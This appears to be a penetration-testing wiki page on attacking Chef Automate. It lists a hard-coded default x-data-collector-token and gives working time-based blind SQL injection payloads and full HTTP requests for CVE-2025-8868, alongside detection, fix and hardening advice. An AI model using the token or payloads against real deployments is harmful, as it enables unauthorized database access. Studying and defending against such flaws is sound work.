Chef Automate Enumeration & Attacks

Reading time: 6 minutes

Overview

This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:

• Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
• Abusing the x-data-collector-token authentication header when defaults are present
• Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search

Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.

Recon: Architecture and Fingerprints

• Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
• API transport: REST to gRPC via gRPC-Gateway
  • Responses may include grpc-metadata-content-type: application/grpc
• Database/driver fingerprints:
  • Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
• Interesting Compliance endpoints (auth required):
  • POST /api/v0/compliance/profiles/search
  • POST /api/v0/compliance/scanner/jobs/search

Auth: Data Collector Token (x-data-collector-token)

Chef Automate exposes a data collector that authenticates requests via a dedicated header:

• Header: x-data-collector-token
• Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
  • 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.

API Schema Inference via Error-Driven Discovery

gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.

For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:

• type: string (filter field identifier)
• values: array of strings

Example request shape:

{
  "filters": [
    { "type": "name", "values": ["test"] }
  ]
}

Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.

Compliance API SQL Injection (CVE-2025-8868)

• Affected endpoint: POST /api/v0/compliance/profiles/search
• Injection point: filters[].type
• Vulnerability class: time-based blind SQL injection in PostgreSQL
• Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.

Working time-based payload:

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}

Technique notes:

• Close the original string with a single quote
• Concatenate a subquery that calls pg_sleep(N)
• Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded

Proof via differential latency

Send paired requests and compare response times to validate server-side execution:

• N = 1 second

POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}

• N = 5 seconds

POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}

Observed behavior:

• Response times scale with pg_sleep(N)
• HTTP 500 responses may include pq: details during probing, confirming SQL execution paths

Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.

Impact

Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.

Affected versions / Fix

• CVE: CVE-2025-8868
• Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories

Detection and Forensics

• API layer:
  • Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
  • Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
• Database layer (PostgreSQL):
  • Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
• Authentication:
  • Log and alert on usage of x-data-collector-token, especially known default values, across API paths

Mitigations and Hardening

• Immediate:
  • Rotate/disable default data collector tokens
  • Restrict ingress to data collector endpoints; enforce strong, unique tokens
• Code-level:
  • Parameterize queries; never string-concatenate SQL fragments
  • Strictly whitelist allowed type values on the server (enum)
  • Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists

Practical Testing Checklist

• Check if x-data-collector-token is accepted and whether the known default works
• Map the Compliance API request schema by inducing validation errors and reading error messages/headers
• Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
• Use time-based techniques with concatenation to keep SQL syntactically valid across contexts

References

• Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)
• Timing trace (XBOW)
• CVE-2025-8868
• gRPC-Gateway
• pq PostgreSQL driver for Go